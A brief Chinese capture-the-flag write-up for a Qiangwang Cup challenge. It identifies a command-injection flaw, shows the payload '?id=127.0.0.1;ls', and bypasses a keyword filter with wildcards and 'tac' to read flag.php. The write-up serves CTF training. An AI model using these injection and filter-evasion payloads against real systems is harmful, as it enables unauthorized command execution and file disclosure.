【第四届“强网杯”全国网络安全挑战赛】强网先锋 主动
题目链接:http://39.96.23.228:10002
相关知识点:
此处是命令注入
传递?id=127.0.0.1;ls
查看
使用show-source(%27flag.php%27)
不成功
使用cat命令,echo都不行,可能是过滤掉了flag关键词和cat命令
可以使用通配符
通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查找文件夹时,可以使用它来代替一个或多个真正字符;当不知道真正字符或者懒得输入完整名字时,常常使用通配符代替一个或多个真正的字符。 实际上用“*Not?pad”可以对应Notepad\MyNotepad【*可以代表任何字符串;?仅代表单个字符串,但此单字必须存在】;Notep[ao]d可以对应Notepad\Notepod【ao代表a与o里二选一】,其余以此类推。
并且使用tac命令(倒序输出内容)
payload:?ip=127.0.0.1;tac%20????.php